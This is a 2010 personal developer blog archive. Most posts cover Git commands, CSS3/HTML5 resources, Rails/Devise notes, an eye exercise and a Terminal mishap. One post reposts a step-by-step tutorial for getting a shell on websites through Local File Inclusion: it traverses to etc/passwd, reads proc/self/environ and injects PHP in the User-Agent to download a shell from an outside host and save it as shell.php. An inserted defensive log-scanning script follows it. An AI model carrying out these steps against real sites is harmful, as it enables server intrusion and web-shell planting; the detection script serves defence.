Monday, November 22, 2010

Wednesday, November 17, 2010

I got interested in this => Shell via LFI - proc/self/environ method

>> 1 - Introduction
In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injecting malicious code into proc/self/environ. It is a step-by-step tutorial.

>> 2 - Finding LFI
- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.
www.website.com/view.php?page=contact.php
- Now let's replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
There is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.
- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:
www.website.com/view.php?page=../../../etc/passwd
We got an error and no etc/passwd file:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
We successfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
>> 3 - Checking if proc/self/environ is accessible
- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
then proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

>> 4 - Injecting malicious code
- Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:
www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in the User-Agent field write the following code :
Then submit the request.
Our command will be executed (it will download the txt shell from http://hack-bay.com/Shells/gny.txt and save it as shell.php in the
website directory) through system(), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

>> 5 - Access our shell
- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.
www.website.com/shell.php
Our shell is there. The injection was successful.
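A defender-side complement to the steps above, added here and not part of the original tutorial: a Python triage script run over constructed web-server access-log lines that flags the traversal sequences, the etc/passwd and proc/self/environ reads, and a PHP open tag in the User-Agent or Referer, so the probing sequence of sections 2 to 4 stands out in the logs. The log lines, IP addresses and User-Agent values are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); 203.0.113.5 walks
# the probing sequence the tutorial describes, 198.51.100.9 is normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Nov/2010:10:00:01 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Nov/2010:10:00:07 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Nov/2010:10:00:12 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "Opera/9.80"
203.0.113.5 - - [17/Nov/2010:10:00:20 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?php echo 1; ?>"
198.51.100.9 - - [17/Nov/2010:10:01:00 +0000] "GET /view.php?page=about.php HTTP/1.1" 200 640 "-" "curl/7.21"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SENSITIVE_RE = re.compile(r'/etc/passwd|/proc/self/environ', re.IGNORECASE)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)  # PHP open tag inside a header

def classify(line):
    """Parse one log line and return a dict with the indicators it shows, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so single- and double-URL-encoded ../ sequences are both caught.
    uri = unquote(unquote(m.group('uri')))
    findings = []
    if TRAVERSAL_RE.search(uri):
        findings.append('traversal')
    if SENSITIVE_RE.search(uri):
        findings.append('sensitive-file')
    # PHP tag in User-Agent or Referer: both values land in /proc/self/environ (step 4).
    if PHP_TAG_RE.search(unquote(m.group('ua'))) or PHP_TAG_RE.search(unquote(m.group('referer'))):
        findings.append('php-in-header')
    return {'ip': m.group('ip'), 'uri': uri, 'status': int(m.group('status')),
            'findings': findings}

def triage(entry):
    """Rank an entry: a served environ read with PHP in a header is the worst case."""
    f = set(entry['findings'])
    if 'php-in-header' in f and 'sensitive-file' in f and entry['status'] == 200:
        return 'high'
    if 'sensitive-file' in f:
        return 'medium'
    return 'low' if f else 'none'

def scan(log_text):
    entries = (classify(line) for line in log_text.splitlines())
    return [(e, triage(e)) for e in entries if e and e['findings']]
```

A 'high' hit is the signal to pull the served response size and the source IP's full session, since a 200 with a PHP tag in a header means the page may already have executed it.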

>> 6 - Shoutz
Shoutz to all members of www.insecurity-ro.org and www.h4cky0u.org.

Sunday, November 7, 2010

Git cheat sheets

My new cheat sheets


Global setup:

  Download and install Git
  git config --global user.name "Your Name"
  git config --global user.email ajcubeta@gmail.com

Next steps:

  mkdir mongoidtest
  cd mongoidtest
  git init
  touch README
  git add README
  git commit -m 'first commit'
  git remote add origin git@github.com:ajcubeta/mongoidtest.git
  git push origin master

Existing Git Repo?

  cd existing_git_repo
  git remote add origin git@github.com:ajcubeta/mongoidtest.git
  git push origin master


Tuesday, November 2, 2010

Quick Tip: Getting Clever with CSS3 Shadows

Source File
http://snipplr.com/view/43454/css3-skewed-shadows/


Generate a HTML5 Framework with SwitchToHTML5


Why use HTML5?

HTML5 is the new kid on the block, sure, and with reports that an official specification won't be fully completed and officially supported until 2022, you may be wondering why you should use it in your new site.

Well, there's one main reason (for me at least), and that is: The Future. The simple fact is that HTML4/XHTML1.0/CSS2 are outdated, and the new XHTML 2 standard has been scrapped in favor of HTML5. CSS3 is gaining more and more momentum every single day, the future of the web is HTML5.

That's also the main reason I've made this site. Usability: when I'm creating new websites or converting old ones to a new language, I find that a framework is a very handy thing to have, so I made this script, which is written in PHP, and provides me with a usable HTML5 framework every single time. I decided to make it web accessible as I figured that others may find it useful too, so enjoy!


HTML5 Templates

http://freehtml5templates.com/shopfashion-html5-and-css3-template/

Tuesday, October 12, 2010

Yoga for the eye

Here's an ancient yoga exercise that you can use to stretch your eyes.

1. Close your eyes, and relax your eyelids, forehead and face. Keep your neck and head still. Breathe easily and regularly.
2. Imagine you're facing a clock, with your nose at its centre. As you stretch your eyes all the way up, you can just barely see the number 12 at the top of this imaginary clock. (Remember, your eyes are closed.) Starting at 12, rotate your eyes clockwise in a circular motion, around the clock. Stretch your eyes as you rotate them, but don't strain or force the movements.
3. Repeat for 10 to 20 clockwise circles.
4. Change direction and make 10 to 20 circles in a counter-clockwise direction.

Most people carry at least some tension and rigidity in these muscles. You can tell this when:

* Your eyes unconsciously jump out of your control.
* During sections of the rotation, the movements feel stiffer, more tense or stuck.

Holding your breath is a sign of tension. Remember to breathe! Where in the movements did your muscles tense up? When did they jump out of control? What parts of the movements were not smooth? With practice, you'll be able to make all parts of the circular movement smooth and easy.

By itself, this eye stretch won't give you perfect vision, but it definitely has its place in a total system of vision improvement.

Thursday, July 8, 2010

Devise Authentication Test deployed at Heroku

Last Wednesday 07/07/2010 I managed to deploy my new sample Devise tool in a Rails 3.0 application :) and I'm quite happy I successfully deployed it at Heroku | a Ruby Cloud Platform as a Service. The name of my app is http://deviseauthtest.heroku.com/.

It's basically a sample authentication with a lot of features and minimum code experience behind it, because the gem already sets it all up for me. This gem already comes with 11 modules that you will be able to use inside the model, called User in my case. It has 11 modules, namely (Database Authenticatable, Token Authenticatable, Confirmable, Recoverable, Registerable, Rememberable, Trackable, Timeoutable, Validatable, Lockable), and so far I don't have any questions or problems when I tried to modify the look and feel of the nifty generator authored by Ryan Bates from Railscasts :)

It's kinda pretty, though, as it's very simple to use. Go try it yourself and see the difference running this cool gem compared to just creating User model authentication inside your system with not much security, compared to this well modularized toolkit on GitHub called "Devise".

My next plan is to try another PDF gem named PDFKit ... else I have to stick with Prawn or RFPDF.

see you next time ;) andre

Monday, June 28, 2010

For the record: installing Rails 2.x to compare, and later turning back to Rails 3.0 BETA

I'm installing a new DB on my machine, PostgreSQL, as I want to test and compare it with my previous on-plate DB, MySQL. I was still working on the backup of my files when I noticed a link that is quite important, so I'm keeping it here for the record.
http://www.robbyonrails.com/articles/2008/01/22/installing-ruby-on-rails-and-postgresql-on-os-x-third-edition
I'll post if I run into bugs and errors as I go along the way.

Sunday, June 27, 2010

How stupid I am deleting my Terminal App!

From this article http://www.ruby-forum.com/topic/212116#921458 (thanks to a friend, Frank, for helping me sort out my problem with an error installing gems for Rails 3.0.0.beta4 on a Mac OS X machine)

Following the steps made it work in the specific directory, but the root directory had some problems with it. So I decided to follow the article and edit the bash_profile, in which I accidentally modified a few lines, so that my Bash terminal commands wouldn't work anymore; it says ... "-bash: ___: command not found" (whoami, ls, cat, tail, etc.). How stupid I am: I moved the Terminal app to the Desktop, moved it to the Trash and emptied the Trash just to get my machine back to where it was supposed to be working. The problem now, while I'm trying to fix the command line, which is found under /usr/bin, is that it won't work, so that's it, the Terminal was removed from my machine :( ... "How stupid I am..." It's the most important "app" that I need to work on a few web apps :( . Now I'm worried as to how to resolve this issue. The only solution I could think of is to get the 10.6x CD from the office and reinstall it back here. So I'm stranded for the rest of the weekend and a few hours before and after the weekend :(. So that's it. I'd better play and watch a movie this time. See you then tomorrow.

Wednesday, June 23, 2010

Working on CSS3 in tandem with HTML5 as my next project

A few items on my checklist that need to be read while I work on new stuff at the same time are: (tutorialfeed for CSS2 vs CSS3, css3.info, diveintohtml5, rubyinside)

The TutorialFeed article differentiating CSS2 from CSS3 (http://www.tutorialfeed.org/2009/02/difference-between-css2-and-css3.html) is basically additional knowledge for me on working with CSS2 vs CSS3; they differ in a few additional attributes, so at least I have a few to work on and test. Another site that I'm interested in shows how CSS3 works with the different latest browsers
(http://www.css3.info/wp-content/uploads/2007/07/css3_support.htm); this will help me detect a few incompatibilities when developing web applications that run on CSS3 and working with the markup language. I also have a few reviews of (http://diveintohtml5.org/), which is helpful when diving into a markup language like HTML5 ... I'll be working on a web application sooner. And lastly I'm checking this site (http://www.rubyinside.com/nethttp-cheat-sheet-2940.html); I might be testing out a sample .erb file based on the Net::HTTP cheat sheet. I'm new to this, so this is quite exciting for me. See you then :) ... my 1st blog post @ Blogger.com